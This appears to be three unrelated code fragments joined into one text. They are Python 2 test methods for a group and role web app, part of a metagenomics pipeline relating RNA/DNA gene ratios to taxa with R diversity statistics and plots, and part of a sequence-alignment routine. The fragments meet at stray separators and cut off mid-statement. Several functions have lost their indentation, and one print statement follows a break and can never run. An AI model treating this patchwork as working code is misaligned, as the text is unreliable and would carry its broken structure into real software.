    ga=GroupStat(name='A', st_name=['u_f', 'a_f', 'lesson_in'], role_propertys_add=[{'name':'admin' , 'change':['a_f','@invite'] , 'visible': ['u_f', 'a_f']}])
    self.create_group(ga)
    self.put_object_to_group(PutObjectTo(child_object='<EMAIL>', group_name='A', role='admin'))
    self.put_object_to_group(PutObjectTo(child_object='<EMAIL>', group_name='A', role='user'))
    print "++create group + 2 users nomad & ff"
    #gupd = GroupStat(name='A', st_name=['card'], st_opt=['+@u_f'], role_propertys_add=[{'name':'admin', 'change':['card'], 'visible': []}])
    #self.update_group(gupd)
    self.use_card(CardId(card_id='123', child_object='<EMAIL>', stat_pls='u_f'))
    # second call omits child_object: exercises the no-target path
    self.use_card(CardId(card_id='123', stat_pls='u_f'))
def T_fill_attr(self):
    """Re-seed the datastore, then verify attribute filling across a group
    template copy ('A' -> 'b') and putting group 'U' inside group 'A',
    finishing with a T_show_user dump (defined elsewhere in this module).
    """
    self.start(Answer())
    ga=GroupStat(name='A', st_name=['name', 'name', 'lesson_in', 'lesson_in', 'jump'], st_opt=['0','like','nero',"ranking","ranking"], st_ifbase=[True, True, False,False,False], st_place=[0], role_propertys_add=[{'name':'admin' , 'change':['name', 'lesson_in', 'jump', '@invite'], 'visible': []}, {'name':'user' , 'change':['lesson_in','jump'] , 'visible': []}])
    self.create_group(ga)
    self.put_object_to_group(PutObjectTo(child_object='<EMAIL>', group_name='A', group_creator='<EMAIL>', role='admin'))
    #self.put_object_to_group(PutObjectTo(child_object='<EMAIL>', group_name='A', group_creator='<EMAIL>', role='user'))
    #self.put_object_to_group(PutObjectTo(child_object='1@', group_name='A', role='user', kind='user'))
    print "TEST CREATE GROUP COPY TMP"
    gb=CopyGroup(old_name='A', old_author='<EMAIL>', new_name='b')
    self.copy_template(gb)
    print "TEST PUT USER AND GROUP"
    #self.put_object_to_group(PutObjectTo(child_object='b', group_name='A', kind='group'))
    #self.put_object_to_group(PutObjectTo(child_object='<EMAIL>', group_name='b', role='admin', kind='user'))
    #-self.create_group(gb)
    #-self.put_object_to_group(PutObjectTo(child_object='<EMAIL>', group_name='B', role='admin', kind='user'))
    gp=GroupStat(name='U', st_name=['hw', 'lesson_in2', 'name'], st_opt=['photo',"nero",'0'], st_ifbase=[False,False,True], role_propertys_add=[{'name':'admin' , 'change':[], 'visible': []}])
    self.create_group(gp)
    self.put_object_to_group(PutObjectTo(child_object='U', child_gr_author='<EMAIL>', group_name='A', group_creator='<EMAIL>'))
    # u is a urlsafe ndb key for the ffbskt Base entity
    T_show_user(self, Answer(), u='ahFkZXZ-dW5pdmVyc2l0eWdpbXIaCxIEQmFzZSIQZmZic2t0QGdtYWlsLmNvbQw', s='<EMAIL>')
def T_Nero(self):
    """Edit a 'nero'-type stat for two users, then push a direct value
    through self.fill_attr (upgrade=True) on the second user's entity."""
    print '--T Edit Nero stat'
    u1 = User(mail='<EMAIL>', return_ch=[0,], st_def=['23',], st_name=['lesson_in',], st_opt=['nero',])
    self.edit_user(u1)
    # reuse the same message object for a second user
    u1.mail = '1@'
    self.edit_user(u1)
    entity = ndb.Key(Base, '1@').get()
    self.fill_attr({'st_name':['lesson_in',], 'value':['203',], 'opt':['nero',]}, entity, upgrade=True, group_name=1, auth_mail='<EMAIL>')
    entity.put()
    #param={'name':'Bskt', 'st_name':['name', 'level'], 'st_opt':['0', 'ranking'], 'st_place':[2], 'st_w':[1.0], 'st_ifbase':[True,False], 'role_propertys_add':[{'name':'@open', 'change':[],'visible': ['name','level']}]}, mescls=GroupStat, f='create_group')
def T_Normativ(self):
    """Recompute the Basketball top ranking via Show.compute_top.

    The schema update that would add a 'normativ' ranking stat is kept
    below but commented out, so param_add_stat is currently unused.
    """
    #self.put_object_to_group(PutObjectTo(child_object='<EMAIL>', group_name='Basketball', group_creator='<EMAIL>', role='referi'))
    #self.put_object_to_group(PutObjectTo(child_object='<EMAIL>', group_name='General parametrs', group_creator='<EMAIL>', role='user'))
    #self.put_object_to_group(PutObjectTo(child_object='<EMAIL>', group_name='Basketball', group_creator='<EMAIL>', role='user'))
    param_add_stat={'name':'Basketball', 'st_name':['normativ'], 'st_opt':['ranking'], 'st_place':[1], 'st_w':[1.0], 'st_ifbase':[False], 'role_propertys_add':[{'name':'referi', 'change':['normativ'], 'visible':[]},{'name':'admin', 'change':['normativ'], 'visible':[]},{'name':'user', 'change':[], 'visible':['normativ']} ]}
    #T_f(self, param=param_add_stat, mescls=GroupStat, f='create_group')
    #T_f(self, param={'creator_mail':'<EMAIL>','name':'Basketball'}, mescls=GroupStat, f='update_group')
    T_f(self, param={'group_url':BASKETBALL_GROUP_URL}, mescls=Show, f='compute_top')
def tl(self):
line = '<EMAIL>, 22557695, <EMAIL>, 19650399, <EMAIL>, 19149119, <EMAIL>, 16943455, <EMAIL>, 16843263, <EMAIL>, 15840495, <EMAIL>, 15238975, <EMAIL>, 14938148, <EMAIL>, 14336612, me.scribe.<EMAIL>, 11930623, <EMAIL>, 11028383, <EMAIL>, 10827839, <EMAIL>, 7719716, <EMAIL>, 7018047, <EMAIL>, 7018047, <EMAIL>, 7017983, <EMAIL>, 5113183, <EMAIL>, 4411519, <EMAIL>, 4411455, <EMAIL>, 3709727, <EMAIL>, 3208415, <EMAIL>, 3208319, <EMAIL>, 1804687, <EMAIL>, 701807, <EMAIL>, 401215, <EMAIL>, 401151'
print line.split(', ')
arr = line.split(', ')
ml = ''
for i, d in enumerate(arr):
print '@', i, d, i%2
if not i%2:
self.put_object_to_group(PutObjectTo(child_object=d, | |
ifelse(anno$status == "down.both", "darkGreen", sidecols)''')
R('''sidecols <- ifelse(anno$status == "down.DNA", "blue", sidecols)''')
R('''sidecols <- ifelse(anno$status == "up.DNA", "orange", sidecols)''')
# scale data
R('''dat.s <- data.frame(t(apply(dat,1,scale)))''')
R('''dat.s <- dat.s[rownames(anno),]''')
R('''colnames(dat.s) <- colnames(dat)''')
# just get steady state and colitis
# R('''print(dim(dat.s))''')
R('''dat.s <- dat.s[,c(9:16, 25:32)]''')
R('''png("%s")''' % outfile)
R('''heatmap.2(as.matrix(dat.s),
trace = "none",
Colv = F,
Rowv = T,
col = colors,
distfun = distfun,
hclustfun = hclustfun,
margins = c(15,15),
RowSideColors = sidecols)''')
R["dev.off"]()
#########################################
#########################################
#########################################
# associate genes with taxonomic
# assignments
#########################################
#########################################
#########################################
@transform(annotateRNADNARatio, suffix(".tsv"), ".list")
def buildGeneListForTaxaAssociations(infile, outfile):
    '''
    Extract the gene/COG identifier column (field 1, header dropped)
    from the annotated RNA/DNA ratio table into a plain one-per-line
    list used downstream when associating genes with taxa.
    '''
    # P.run() interpolates %(infile)s / %(outfile)s from the caller's
    # locals, so this variable must be named exactly "statement".
    statement = '''cat %(infile)s | cut -f1 | tail -n+2 > %(outfile)s'''
    P.run()
#########################################
#########################################
#########################################
@follows(mkdir("associate_taxa.dir"), buildGeneListForTaxaAssociations)
@transform(glob.glob(os.path.join(PARAMS.get("rna_communitiesdir"), "genes.dir/*.genes.tsv.gz")),
           regex("(\S+)/(\S+).genes.tsv.gz"),
           add_inputs(glob.glob(os.path.join(PARAMS.get("rna_communitiesdir"), "diamond.dir/*.diamond.lca.gz"))),
           r"associate_taxa.dir/\2.ctaxa.tsv.gz")
def buildCountTaxaInCogsRNA(infiles, outfile):
    '''
    Cross-reference reads that map to differentially expressed genes with
    their taxonomic (genus-level) assignment, producing per-taxon counts
    for each gene via the diff2genera.py project script.
    '''
    # job_options is picked up from locals by P.run() for cluster submission
    job_options="-l mem_free=20G"
    m = PARAMS.get("genes_map")
    alignment_genes = infiles[0]
    # pair the gene alignment with the taxa (LCA) file of the same track
    track = P.snip(os.path.basename(alignment_genes), ".diamond.genes.tsv.gz")
    alignment_taxa = [x for x in infiles[1] if os.path.basename(x).startswith(track)][0]
    statement = '''python %(projscripts)s/diff2genera.py
                   -m %(m)s
                   -d rna_dna_ratio.dir/ratio_genes.annotated.list
                   --alignment-taxa=%(alignment_taxa)s
                   --alignment-genes=%(alignment_genes)s
                   --counts
                   --log=%(outfile)s.log
                   | gzip > %(outfile)s'''
    P.run()
#########################################
#########################################
#########################################
@merge(buildCountTaxaInCogsRNA, "associate_taxa.dir/associated_taxa_counts.tsv.gz")
def mergeCountTaxaInCogsRNA(infiles, outfile):
    '''
    Merge the per-sample gene-to-taxa count tables into a single gzipped
    table, joined on the first two columns with per-sample column prefixes.
    '''
    pattern = os.path.dirname(infiles[0]) + "/*.ctaxa.tsv.gz"
    prefixes = ",".join([P.snip(os.path.basename(x), ".diamond.ctaxa.tsv.gz") for x in glob.glob(pattern)])
    # combine_tables joins on columns 1,2 (gene, taxon); missing cells -> 0
    statement = '''python %(scriptsdir)s/combine_tables.py
                   --glob=%(pattern)s
                   --missing=0
                   --prefixes=%(prefixes)s
                   --columns=1,2
                   --log=%(outfile)s.log
                   | gzip > %(outfile)s'''
    P.run()
#########################################
#########################################
#########################################
@follows(mkdir("cog_diversity.dir"))
@transform(buildCountTaxaInCogsRNA,
           regex("(\S+)/(\S+).tsv.gz"),
           r"cog_diversity.dir/\2.diversity.tsv")
def buildCogDiversity(infile, outfile):
    '''
    For each COG, estimate the taxonomic diversity of its expression with
    the R vegan package: chao1 richness plus evenness computed as
    diversity/log(species number) — Pielou's J, assuming vegan's default
    Shannon index (NOTE(review): confirm index choice).
    Rows whose taxon is "unassigned" are excluded first.
    '''
    R('''library("vegan")''')
    R('''dat <- read.csv("%s", header = T, stringsAsFactors = F, sep = "\t")''' % infile)
    # drop reads that could not be assigned to a taxon
    R('''dat <- dat[grep("unassigned", dat$taxa, invert = T),]''')
    R('''cogs <- unique(dat$cog)''')
    R('''chao.ests <- c()''')
    R('''evennesses <- c()''')
    R('''for (cog in cogs){
         dat2 <- dat[dat$cog == cog,]
         res <- data.frame(estimateR(dat2[,3]))
         chao1.est <- res["S.chao1",]
         chao.ests <- append(chao.ests, chao1.est)
         diversity.est <- diversity(dat2[,3])
         nspecies <- specnumber(dat2[,3])
         evenness <- diversity.est/log(nspecies)
         evennesses <- append(evennesses, evenness)
         }''')
    R('''result <- data.frame("gene" = cogs, "chao1" = chao.ests, "evenness" = evennesses)''')
    R('''write.table(result, file = "%s", quote = F, sep = "\t", row.names = F)''' % outfile)
#########################################
#########################################
#########################################
@merge(buildCogDiversity, "cog_diversity.dir/cog_transcriptional_diversity.tsv.gz")
def mergeCogDiversity(infiles, outfile):
    '''
    Merge the per-sample COG diversity tables into one gzipped table:
    join on column 1 (gene), take columns 2,3 (chao1, evenness) from each
    file with per-sample column prefixes.
    '''
    pattern = os.path.dirname(infiles[0]) + "/*.diversity.tsv"
    prefixes = ",".join([P.snip(os.path.basename(x), ".diversity.tsv") for x in glob.glob(pattern)])
    statement = '''python %(scriptsdir)s/combine_tables.py
                   --glob=%(pattern)s
                   --missing=0
                   --prefixes=%(prefixes)s
                   --columns=1
                   --take=2,3
                   --log=%(outfile)s.log
                   | gzip > %(outfile)s'''
    P.run()
#########################################
#########################################
#########################################
@merge([mergeCogDiversity, buildGenesOutsidePredictionInterval],
       "cog_diversity.dir/cog_transcriptional_diversity_annotated.tsv")
def mergeCogDiversityWithAnnotations(infiles, outfile):
    '''
    Annotate merged COG diversity estimates with differential
    abundance status.

    Adds per-COG averages of the per-sample chao1 and evenness columns,
    joins the table with the gene annotations on their shared columns,
    and writes the result as tab-separated text.
    '''
    diversity_file, annotation_file = infiles[0], infiles[1]
    diversity = pandas.read_table(diversity_file, compression="gzip")
    # average the per-sample richness/evenness columns across samples
    richness_cols = diversity.filter(like="chao1", axis=1)
    evenness_cols = diversity.filter(like="evenness", axis=1)
    diversity["average_richness"] = richness_cols.mean(axis=1)
    diversity["average_evenness"] = evenness_cols.mean(axis=1)
    annotations = pandas.read_table(annotation_file)
    annotated = pandas.merge(diversity, annotations)
    annotated.to_csv(outfile, sep="\t")
#########################################
#########################################
#########################################
@transform(mergeCogDiversityWithAnnotations,
           suffix("_diversity_annotated.tsv"),
           "_richness.pdf")
def plotCogRichnessDistributions(infile, outfile):
    '''
    Plot empirical cumulative distributions (ECDFs) of the average
    per-COG richness, stratified by differential abundance status
    (pi_status), and save the figure as a pdf.
    '''
    R('''library(gplots)''')
    R('''library(gtools)''')
    R('''library(ggplot2)''')
    R('''dat <- read.csv("%s", header = T, stringsAsFactors = F, sep = "\t", row.names = 1)''' % infile)
    # non-significant genes keep the "NS" label regardless of their
    # prediction-interval call; significant genes without a call are
    # labelled "other_significant"
    R('''dat$pi_status <- ifelse(dat$status == "NS", "NS", dat$pi_status)''')
    R('''dat$pi_status[dat$pi_status == ""] <- "other_significant"''')
    #R('''dat$pi_status <- ifelse(dat$pi_status == "", dat$status, dat$pi_status)''')
    # # ks test
    # for x, y in itertools.product([1,2,3,4,5],[1,2,3,4,5]):
    #     outf = "associate_taxa.dir/cluster-%i_cluster-%i.sig" % (x,y)
    #     R('''k <- ks.test(averages$mean[averages$class == %i],averages$mean[averages$class == %i])''' % (x,y))
    #     R('''k <- data.frame("D" = k[[1]], "p-value" = k[[2]])''')
    #     R('''write.table(k, file = "%s", sep = "\t")''' % outf)
    # one ECDF curve per pi_status class
    R('''plot1 <- ggplot(dat, aes(x = average_richness, colour = factor(pi_status))) + stat_ecdf(size = 1.2)''')
    R('''plot1 + scale_colour_manual(values = c("cyan3", "darkorchid", "black", "darkgoldenrod2", "grey", "darkBlue"))''')
    #stat_ecdf(size = 0.3)''')
    # R('''plot1 + scale_colour_manual(values = c("orange", "purple", "red", "brown", "darkGreen"))''')
    # ggsave writes the last plot printed to the R device
    R('''ggsave("%s")''' % outfile)
#########################################
#########################################
#########################################
@transform(mergeCogDiversityWithAnnotations,
           suffix("_diversity_annotated.tsv"),
           "_evenness.pdf")
def plotCogEvennessDistributions(infile, outfile):
    '''
    Plot empirical cumulative distributions (ECDFs) of the average
    per-COG evenness, stratified by differential abundance status
    (pi_status), and save the figure as a pdf.
    '''
    R('''library(gplots)''')
    R('''library(gtools)''')
    R('''library(ggplot2)''')
    R('''dat <- read.csv("%s", header = T, stringsAsFactors = F, sep = "\t", row.names = 1)''' % infile)
    # non-significant genes keep the "NS" label; significant genes
    # without a prediction-interval call become "other_significant"
    R('''dat$pi_status <- ifelse(dat$status == "NS", "NS", dat$pi_status)''')
    R('''dat$pi_status[dat$pi_status == ""] <- "other_significant"''')
    # evenness is NA for single-species COGs (division by log(1));
    # remove them before plotting
    R('''dat <- na.omit(dat)''')
    R('''print(unique(dat$pi_status))''')
    # R('''dat$pi_status <- ifelse(dat$status == "NS", "NS", dat$pi_status)''')
    # R('''dat$pi_status <- ifelse(dat$pi_status == "", dat$status, dat$pi_status)''')
    # # ks test
    # for x, y in itertools.product([1,2,3,4,5],[1,2,3,4,5]):
    #     outf = "associate_taxa.dir/cluster-%i_cluster-%i.sig" % (x,y)
    #     R('''k <- ks.test(averages$mean[averages$class == %i],averages$mean[averages$class == %i])''' % (x,y))
    #     R('''k <- data.frame("D" = k[[1]], "p-value" = k[[2]])''')
    #     R('''write.table(k, file = "%s", sep = "\t")''' % outf)
    # one ECDF curve per pi_status class
    R('''plot1 <- ggplot(dat, aes(x = average_evenness, colour = factor(pi_status))) + stat_ecdf(size = 1.2)''')
    R('''plot1 + scale_colour_manual(values = c("cyan3", "darkorchid", "black", "darkgoldenrod2", "grey", "darkBlue"))''')
    # R('''plot1 + scale_colour_manual(values = c("orange", "purple", "red", "brown", "darkGreen"))''')
    R('''ggsave("%s")''' % outfile)
#########################################
#########################################
#########################################
@follows(mkdir("associate_taxa.dir"), buildGeneListForTaxaAssociations)
@transform(glob.glob(os.path.join(PARAMS.get("rna_communitiesdir"), "genes.dir/*.genes.tsv.gz")),
           regex("(\S+)/(\S+).genes.tsv.gz"),
           add_inputs(glob.glob(os.path.join(PARAMS.get("rna_communitiesdir"), "diamond.dir/*.diamond.lca.gz"))),
           r"associate_taxa.dir/\2.ptaxa.tsv.gz")
def buildProportionTaxaInCogsRNA(infiles, outfile):
    '''
    Cross-reference reads that map to differentially expressed genes
    with their genus-level (LCA) taxonomic assignment.

    For each sample the gene alignment file (infiles[0]) is matched by
    track name to its diamond LCA file (from infiles[1]); both are
    handed to diff2genera.py, which writes the gzipped per-genus
    proportions to ``outfile``.
    '''
    # the LCA files are large — request extra memory from the scheduler
    job_options="-l mem_free=25G"
    m = PARAMS.get("genes_map")
    alignment_genes = infiles[0]
    # the track name links the gene alignments to the matching taxonomy file
    track = P.snip(os.path.basename(alignment_genes), ".diamond.genes.tsv.gz")
    alignment_taxa = [x for x in infiles[1] if os.path.basename(x).startswith(track)][0]
    statement = '''python %(projscripts)s/diff2genera.py
                   -m %(m)s
                   -d rna_dna_ratio.dir/ratio_genes.annotated.list
                   --alignment-taxa=%(alignment_taxa)s
                   --alignment-genes=%(alignment_genes)s
                   --level=genus
                   --log=%(outfile)s.log
                   | gzip > %(outfile)s'''
    P.run()
#########################################
#########################################
#########################################
@merge(buildProportionTaxaInCogsRNA, "associate_taxa.dir/associated_ptaxa.tsv.gz")
def mergeProportionTaxaInCogsRNA(infiles, outfile):
    '''
    Merge per-sample tables of taxa proportions associated with genes.

    combine_tables.py joins the ``*.ptaxa.tsv.gz`` files on their two
    key columns, which it fuses into a single "<cog>-<taxa>" field; the
    second stage splits that field back into separate cog and taxa
    columns while copying the table to ``outfile``.
    '''
    temp = P.getTempFilename(".")
    pattern = os.path.dirname(infiles[0]) + "/*.ptaxa.tsv.gz"
    # track names derived from the file names become column prefixes
    prefixes = ",".join(
        [P.snip(os.path.basename(x), ".diamond.ptaxa.tsv.gz")
         for x in glob.glob(pattern)])
    statement = '''python %(scriptsdir)s/combine_tables.py
                   --glob=%(pattern)s
                   --missing=0
                   --prefixes=%(prefixes)s
                   --columns=1,2
                   --log=%(outfile)s.log
                   > %(temp)s'''
    P.run()
    # Split the fused "cog-taxa" key back into two columns.  try/finally
    # guarantees the handles are closed (the original leaked both), and
    # iterating the handle avoids reading the whole table into memory.
    inf = IOTools.openFile(temp)
    outf = IOTools.openFile(outfile, "w")
    try:
        header = inf.readline()[:-1].split("\t")
        header = header[0].split("-") + header[1:]
        outf.write("\t".join(header) + "\n")
        for line in inf:
            data = line[:-1].split("\t")
            cog_taxa = data[0].split("-")
            outf.write("\t".join(cog_taxa + data[1:]) + "\n")
    finally:
        inf.close()
        outf.close()
    os.unlink(temp)
#########################################
#########################################
#########################################
@transform(mergeProportionTaxaInCogsRNA,
           suffix(".tsv.gz"),
           ".average_ptaxa.matrix")
def buildTaxaCogCountsMatrix(infile, outfile):
    '''
    Build a taxa x COG matrix of average proportions.

    First pass over the table collects the set of COGs (skipping
    "unassigned" taxa); second pass averages each cog/taxa row's
    per-sample proportions and stores it in a nested dict, which
    pandas turns into the final matrix (missing cells written as 0).
    '''
    result = {}
    # first pass: create one (empty) entry per COG
    inf = IOTools.openFile(infile)
    try:
        inf.readline()  # skip header
        for line in inf:
            data = line[:-1].split("\t")
            cog, taxa = data[0], data[1]
            if taxa == "unassigned":
                continue
            result[cog] = {}
    finally:
        inf.close()
    # second pass: average the per-sample values for each cog/taxa pair.
    # Rows of width 19/20 carry extra leading key fields — presumably an
    # artefact of the upstream merge; TODO confirm against the input.
    inf = IOTools.openFile(infile)
    try:
        inf.readline()  # skip header
        for line in inf:
            data = line[:-1].split("\t")
            cog, taxa = data[0], data[1]
            if len(data) == 19:
                values = list(map(float, data[3:]))
            elif len(data) == 20:
                values = list(map(float, data[4:]))
            else:
                values = list(map(float, data[2:]))
            if taxa == "unassigned":
                continue
            # list(...) is required: in Python 3 `map` returns a lazy
            # iterator and np.mean() raises a TypeError on it (the
            # original passed the bare map object)
            ave = np.mean(values)
            try:
                result[cog][taxa] = ave
            except KeyError:
                continue
    finally:
        inf.close()
    df = pandas.DataFrame(result)
    df.to_csv(outfile, sep="\t", na_rep=0)
###################################################
###################################################
###################################################
@merge([buildTaxaCogCountsMatrix, buildGenesOutsidePredictionInterval],
       "associate_taxa.dir/taxa_cogs_matrix_annotated.pdf")
def plotMaxTaxaContribution(infiles, outfile):
    '''
    Plot the distribution (ECDF) of the maximum genus contribution per
    gene set, stratified by differential abundance status.
    '''
    R('''library(ggplot2)''')
    # infiles[0]: taxa x cog matrix of average proportions;
    # infiles[1]: per-gene differential abundance annotations
    R('''dat <- read.csv("%s", header = T, stringsAsFactors = F, sep = "\t")''' % infiles[0])
    R('''annotations <- read.csv("%s", header = T, stringsAsFactors = F, sep = "\t")''' % infiles[1])
    # the largest single-genus contribution to each COG (column maxima)
    R('''maximums <- apply(dat, 2, max)''')
    R('''dat2 <- data.frame("cog" = colnames(dat), "max" = maximums)''')
    R('''dat3 <- merge(dat2, annotations, by.x = "cog", by.y = "gene")''')
    # non-significant genes keep the "NS" label; genes without a
    # prediction-interval call become "other_significant"
    R('''dat3$pi_status <- ifelse(dat3$status == "NS", "NS", dat3$pi_status)''')
    R('''dat3$pi_status[is.na(dat3$pi_status)] <- "other_significant"''')
    R('''plot1 <- ggplot(dat3, aes(x = as.numeric(as.character(max)), group = pi_status, colour = pi_status)) + stat_ecdf(size = 1.1)''')
    R('''plot1 + scale_colour_manual(values = c("cyan3", "darkorchid", "black", "darkgoldenrod2", "grey", "darkBlue"))''')
    R('''ggsave("%s")''' % outfile)
###################################################
###################################################
###################################################
@merge([buildTaxaCogCountsMatrix, buildGenesOutsidePredictionInterval],
       "associate_taxa.dir/taxa_cogs_matrix_annotated.sig")
def testSignificanceOfMaxTaxaContribution(infiles, outfile):
    '''
    Test whether the distribution of the maximum genus contribution per
    gene set differs from the non-significant (NS) background.

    For each differential-abundance class the max-contribution values
    are compared to the NS genes with a two-sample Kolmogorov-Smirnov
    test; the D statistics and p-values are written as a single row to
    ``outfile``.
    '''
    R('''library(ggplot2)''')
    # infiles[0]: taxa x cog matrix of average proportions;
    # infiles[1]: per-gene differential abundance annotations
    R('''dat <- read.csv("%s", header = T, stringsAsFactors = F, sep = "\t")''' % infiles[0])
    R('''annotations <- read.csv("%s", header = T, stringsAsFactors = F, sep = "\t")''' % infiles[1])
    # the largest single-genus contribution to each COG (column maxima)
    R('''maximums <- apply(dat, 2, max)''')
    R('''dat2 <- data.frame("cog" = colnames(dat), "max" = maximums)''')
    R('''dat3 <- merge(dat2, annotations, by.x = "cog", by.y = "gene")''')
    R('''dat3$pi_status <- ifelse(dat3$status == "NS", "NS", dat3$pi_status)''')
    # per-class vectors of max contributions
    R('''diff.up.rna <- as.numeric(as.character(dat3$max[dat3$pi_status == "diff.up.rna"]))''')
    R('''diff.down.rna <- as.numeric(as.character(dat3$max[dat3$pi_status == "diff.down.rna"]))''')
    R('''diff.up.dna <- as.numeric(as.character(dat3$max[dat3$pi_status == "diff.up.dna"]))''')
    R('''diff.down.dna <- as.numeric(as.character(dat3$max[dat3$pi_status == "diff.down.dna"]))''')
    R('''ns <- as.numeric(as.character(dat3$max[dat3$pi_status == "NS"]))''')
    # Kolmogorov-Smirnov tests: each class against the NS background
    R('''ks1 <- ks.test(diff.up.rna, ns)''')
    R('''ks2 <- ks.test(diff.down.rna, ns)''')
    R('''ks3 <- ks.test(diff.up.dna, ns)''')
    R('''ks4 <- ks.test(diff.down.dna, ns)''')
    R('''res <- data.frame("RNAGreaterThanDNA.up.pvalue" = ks1$p.value,
                           "RNAGreaterThanDNA.up.D" = ks1$statistic,
                           "RNAGreaterThanDNA.down.pvalue" = ks2$p.value,
                           "RNAGreaterThanDNA.down.D" = ks2$statistic,
                           "DNAGreaterThanRNA.up.pvalue" = ks3$p.value,
                           "DNAGreaterThanRNA.up.D" = ks3$statistic,
                           "DNAGreaterThanRNA.down.pvalue" = ks4$p.value,
                           "DNAGreaterThanRNA.down.D" = ks4$statistic)''')
    R('''write.table(res, file = "%s", sep = "\t", quote = F, row.names = F)''' % outfile)
#########################################
#########################################
#########################################
@transform(buildTaxaCogCountsMatrix,
suffix(".matrix"),
add_inputs(buildGenesOutsidePredictionInterval),
".pdf")
def heatmapTaxaCogProportionMatrix(infiles, outfile):
'''
plot the taxa associated with each cog on
a heatmap
'''
R('''library(gplots)''')
R('''library(gtools)''')
R('''dat <- read.csv("%s", header = T, stringsAsFactors = F, sep = "\t", row.names = 1)''' | |
""
for n in range(w_firstp.shape[1]-2*seq_slide):
w_firstp[-1, s + n] = seq_matrix_w1[z, n]
w_firstp_info = seq_info_sharper(seq_freq(w_firstp[:, seq_slide+left_gap:seq_slide+left_gap+seq_length])) ###
if w_firstp_info>w_firstp_info_max:
wbest_firstp = np.zeros(w_firstp.shape)
wbest_firstp = w_firstp
w_firstp_info_max = w_firstp_info
endtime_time = time.clock()
print("0th Pass Done. ", int(endtime_time-start_time), " seconds elapsed")
#Remaining passes will shuffle individual sequences in preceeding passes
w_nextp = np.zeros([wbest_firstp.shape[0]-5, wbest_firstp.shape[1]], dtype='str')
for x in range(w_nextp.shape[0]):
for y in range(w_nextp.shape[1]):
w_nextp[x, y] = wbest_firstp[x+5, y]
print_info = seq_info(seq_freq_orig(w_nextp[:, seq_slide+left_gap:seq_slide+left_gap+seq_length]))
print("Starting information content is: ", print_info)
wnextp_info_1 = seq_info_sharper(seq_freq_orig(w_nextp[:, seq_slide+left_gap:seq_slide+left_gap+seq_length])) ###
wnextp_info_2 = wnextp_info_1 #Initialize variable
pass_counter = 0
w_nextp_best = np.zeros(w_nextp.shape, dtype='str')
while True:
wnextp_info_1 = wnextp_info_2 #Set old value to 'new' value from previous pass
pass_counter += 1
for line in range(w_nextp.shape[0]):
line_info = 0
line_info_max = 0
w_nextp_best = np.zeros(w_nextp.shape, dtype='str')
for s in range(2*seq_slide+1):
for y in range(w_nextp.shape[1]):
w_nextp[line, y] = ""
for y in range(seq_matrix_w1.shape[1]):
w_nextp[line, s + y] = seq_matrix_w1[line, y]
line_info = seq_info_sharp(seq_freq(w_nextp[:, seq_slide+left_gap:seq_slide+left_gap+seq_length])) ###
if line_info>line_info_max:
line_info_max = line_info
for v1 in range(w_nextp_best.shape[0]):
for v2 in range(w_nextp_best.shape[1]):
w_nextp_best[v1, v2] = w_nextp[v1, v2]
if line_info==line_info_max and random.randint(0,1)==1:
line_info_max = line_info
for v1 in range(w_nextp_best.shape[0]):
for v2 in range(w_nextp_best.shape[1]):
w_nextp_best[v1, v2] = w_nextp[v1, v2]
w_nextp = w_nextp_best
wnextp_info_2 = seq_info_sharper(seq_freq_orig(w_nextp_best[:, seq_slide+left_gap:seq_slide+left_gap+seq_length])) ###
print_info = seq_info(seq_freq_orig(w_nextp_best[:, seq_slide+left_gap:seq_slide+left_gap+seq_length]))
endtime_time = time.clock()
print("Pass # ", int(pass_counter), " information content is: ", print_info, ". ", int(endtime_time-start_time), " seconds elapsed")
if wnextp_info_2<wnextp_info_1*improvement_thresh and wnextp_info_2>wnextp_info_1:
break
print("Sequence improvement threshold reached. Malign: SharpER is stopping.")
return(w_nextp_best)
def malign(seq_matrix, seq_slide, seq_start, seq_stop, improvement_thresh, left_gap, seq_length):
    '''
    Align sequences by greedily maximising information content.

    Stages:
      1. heuristic start — brute-force all 2*seq_slide+1 offsets of 5
         randomly chosen sequences and keep the best-scoring consensus;
      2. "0th pass" — append each remaining sequence at its best offset;
      3. iterative passes — re-slide every sequence until a pass's
         improvement drops below ``improvement_thresh``.

    Scoring uses seq_info(seq_freq(...)) over the window
    [left_gap, left_gap+seq_length) of the padded alignment.

    :param seq_matrix: 2-D string array, one sequence per row
    :param seq_slide: maximum shift allowed in each direction
    :param seq_start, seq_stop: column slice of seq_matrix to align
    :param improvement_thresh: relative-improvement stopping threshold
    :param left_gap, seq_length: scoring window inside the padding
    :returns: the optimised alignment matrix
    '''
    print("Malign")
    # time.clock() was removed in Python 3.8; perf_counter() is the
    # drop-in replacement for elapsed-time measurement
    start_time = time.perf_counter()
    seq_matrix_w1 = seq_matrix[:, seq_start:seq_stop]
    seq_matrix_w2_size = [seq_matrix_w1.shape[0], seq_matrix_w1.shape[1] + 2 * seq_slide]
    seq_matrix_w2 = np.zeros(seq_matrix_w2_size, dtype='str')
    # transfer sequences from seq_matrix_w1 to the middle of seq_matrix_w2
    for x in range(0, int(seq_matrix_w1.shape[0])):
        for y in range(0, int(seq_matrix_w1.shape[1])):
            seq_matrix_w2[x, y + seq_slide] = seq_matrix_w1[x, y]
    print(seq_matrix.shape[0], " sequences")
    # Heuristic start: pick five random sequences
    mat_heur = np.zeros([5, int(seq_matrix_w2_size[1])], dtype='str')
    for rowNum in range(mat_heur.shape[0]):
        # BUG FIX: the original used random.randint(0, shape[1]) — an
        # *inclusive* bound over the *column* count — to pick a row,
        # which can raise IndexError and never sampled rows uniformly.
        randRowNum = random.randrange(seq_matrix_w2.shape[0])
        mat_heur[rowNum, :] = seq_matrix_w2[randRowNum, :]
    # Heuristic start: brute force through all offset combinations
    w_heur = np.zeros(mat_heur.shape, dtype='str')
    w_heur_best = np.zeros(mat_heur.shape, dtype='str')
    w_info_max = 0
    w_info_current = 0
    for s0 in range(2 * seq_slide + 1):
        for s1 in range(2 * seq_slide + 1):
            for s2 in range(2 * seq_slide + 1):
                for s3 in range(2 * seq_slide + 1):
                    for s4 in range(2 * seq_slide + 1):
                        for y in range(w_heur.shape[1] - 2 * seq_slide):
                            w_heur[0, s0 + y] = mat_heur[0, y + seq_slide]
                            w_heur[1, s1 + y] = mat_heur[1, y + seq_slide]
                            w_heur[2, s2 + y] = mat_heur[2, y + seq_slide]
                            w_heur[3, s3 + y] = mat_heur[3, y + seq_slide]
                            w_heur[4, s4 + y] = mat_heur[4, y + seq_slide]
                        w_info_current = seq_info(seq_freq(w_heur[:, seq_slide + left_gap:seq_slide + left_gap + seq_length]))
                        if w_info_current > w_info_max:  # keep each better alignment found
                            w_info_max = w_info_current
